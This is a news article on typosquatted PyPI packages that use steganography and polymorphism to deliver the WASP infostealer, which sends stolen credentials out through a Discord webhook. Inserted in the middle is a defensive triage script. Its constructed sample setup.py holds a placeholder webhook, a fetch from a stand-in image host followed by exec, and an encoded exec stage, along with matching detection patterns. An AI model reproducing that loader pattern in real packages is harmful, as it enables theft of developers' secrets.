This infostealer has a vicious sting for Python developers


Cybersecurity researchers from Checkmarx have discovered more than two dozen malicious packages on PyPI, the main public repository for Python packages, and have published their findings in a new report.

The packages carry names almost identical to those of legitimate ones, so that a developer who mistypes a package name, or does not check it before installing, pulls in the malicious package instead of the one they meant. The package's install hooks then run the attacker's code on the developer's machine.

The practice is known as typosquatting, and it is common among cybercriminals who target software developers.

Infostealer thefts

To hide the malware, the attackers use two techniques: steganography and polymorphism.

Steganography is the practice of hiding data inside another file, in this case hiding code inside an image, which allows threat actors to distribute malicious code through seemingly innocent .jpg and .png files. The image itself does nothing; the package's own code fetches it, extracts the embedded payload and executes it, so the stage that actually runs never appears as plain Python in the package.

Polymorphic malware, on the other hand, changes its payload with every install, so no two copies share the same bytes and signature-based antivirus tools and similar defences have nothing stable to match on. Behaviour-based detection is unaffected, since what the code does stays the same.

Here, the attackers used these techniques to deliver WASP, an infostealer that grabs victims' Discord accounts, saved passwords, cryptocurrency wallet data, credit card details and any other information on the victim's endpoint that the attacker deems interesting.

Once collected, the data is sent back to the attackers through a Discord webhook address hard-coded into the malware, which also makes that URL one of the few fixed indicators a defender can look for in a sample.
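To make the indicators above concrete, here is an added static-triage script (the example's own, not code from the article, from Checkmarx or from any package it discusses). It parses a Python file and reports the three shapes the text describes: a hard-coded Discord webhook URL, an image download in the same file as a runtime `exec`, and long base64 literals of the kind a polymorphic loader carries. The two sample setup.py sources are constructed and inert, the placeholder webhook and hostnames are invented, and the regexes and score weights are this example's heuristics, not the researchers' signatures.

```python
"""Static triage of a Python source file for WASP-style delivery indicators.

Added example; not code from the article, Checkmarx or any package it discusses.
The indicator regexes and score weights are this example's own heuristics,
derived from the behaviours described in the text, not vendor signatures.
"""
import ast
import base64
import binascii
import re

WEBHOOK_RE = re.compile(r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+")
IMAGE_URL_RE = re.compile(r"https?://[^\s\"']+\.(?:png|jpe?g|gif)\b", re.I)
DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}
MIN_BLOB = 120  # characters; long base64-looking literals are a common loader tell


def _callee(node: ast.Call) -> str:
    """Return the called name: exec(...) -> 'exec', builtins.exec(...) -> 'exec'."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def _decodes_to_python(blob: str) -> bool:
    """True if a base64 literal decodes to text that mentions import or exec."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return False
    return "import" in text or "exec" in text


def triage(src: str) -> dict:
    """Parse one Python file and score it on the indicators described in the article."""
    strings, dynamic_calls = [], 0
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            strings.append(node.value)
        elif isinstance(node, ast.Call) and _callee(node) in DYNAMIC_EXEC:
            # exec("literal") is odd but static; exec(<computed at runtime>) is the
            # shape a steganographic or polymorphic loader needs.
            if not (node.args and isinstance(node.args[0], ast.Constant)):
                dynamic_calls += 1
    joined = "\n".join(strings)
    webhooks = WEBHOOK_RE.findall(joined)
    image_urls = IMAGE_URL_RE.findall(joined)
    blobs = [s for s in strings if len(s) >= MIN_BLOB and re.fullmatch(r"[A-Za-z0-9+/=]+", s)]
    report = {
        "webhooks": webhooks,
        "image_urls": image_urls,
        "dynamic_exec_calls": dynamic_calls,
        # an image fetch and a runtime exec in the same file: the stego delivery shape
        "image_to_exec": bool(image_urls) and dynamic_calls > 0,
        "encoded_blobs": len(blobs),
        "blob_decodes_to_python": any(_decodes_to_python(b) for b in blobs),
    }
    report["score"] = (3 * len(webhooks) + 3 * report["image_to_exec"] + dynamic_calls
                       + report["encoded_blobs"] + 2 * report["blob_decodes_to_python"])
    return report


# Constructed, inert second stage: only ever base64-encoded into a string literal below.
_STAGE2 = base64.b64encode(b"import os, socket\n# " + b"A" * 100 + b"\nexec(stage3)\n").decode()

# Constructed setup.py mimicking the delivery shape: placeholder webhook, image fetch, exec.
SUSPICIOUS_SETUP = f'''
from setuptools import setup
import base64, requests
HOOK = "https://discord.com/api/webhooks/000000000000000000/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
art = requests.get("https://cdn.example.invalid/banner.png").content
exec(art.split(b"\\x00PY\\x00", 1)[1].decode())
exec(base64.b64decode("{_STAGE2}").decode())
setup(name="constructed-sample", version="0.0.1")
'''

# Constructed benign setup.py: an image URL alone (a project logo) is not flagged.
CLEAN_SETUP = '''
from setuptools import setup
setup(name="constructed-clean", version="1.0", url="https://example.invalid/logo.png")
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("clean", CLEAN_SETUP)):
        print(label, triage(src))
```

Run it over setup.py and every module in an unpacked sdist or wheel before installing. A single image URL or a single exec call scores low on purpose; it is the combination, and the webhook, that distinguishes this delivery pattern from ordinary packaging code. Polymorphism defeats matching on the blob's contents, which is why the script scores the shape of the literal rather than its bytes.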

The campaign also appears to double as advertising: the researchers spotted the threat actors selling the tool on the dark web for $20 and claiming that it is undetectable.

Furthermore, the researchers believe this to be the same group that was behind a similar attack first reported earlier this month by researchers at Phylum and Check Point. Back then, it was said that a group dubbed Worok had been distributing DropBoxControl, a custom .NET C# infostealer that abuses Dropbox file hosting for communication and data theft, since at least September 2022.

Given its toolkit, the researchers believe Worok to be a cyberespionage group that works quietly, moves laterally across target networks and steals sensitive data. It also appears to use its own proprietary tools, as the researchers have not observed them in use by anyone else.

Via: The Register

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
